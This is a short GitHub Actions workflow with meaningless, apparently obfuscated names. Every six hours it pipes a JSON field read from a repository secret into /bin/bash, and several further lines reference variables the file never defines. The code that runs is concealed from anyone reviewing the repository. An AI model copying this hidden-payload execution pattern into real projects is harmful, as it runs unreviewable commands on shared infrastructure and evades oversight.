name: xieqianli3765
on:
  workflow_dispatch:
  schedule:
    - cron: '26 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xieqianli3765
        env:
          ljnl18: ${{ secrets.ljnl18 }}
        run: |
          echo $ljnl18 | jq -r .ratwk00 | /bin/bash
          echo $ysfm1933 | jq -r .chi3546 | /bin/bash
          echo $at237 | jq -r .tn25992 | /bin/bash
          echo $iz22 | jq -r .kj70332 | /bin/bash
          echo $xd8 | jq -r .peh03 | /bin/bash
          echo $q79 | jq -r .muk4 | /bin/bash
          echo $x6889 | jq -r .wbhd79 | /bin/bash

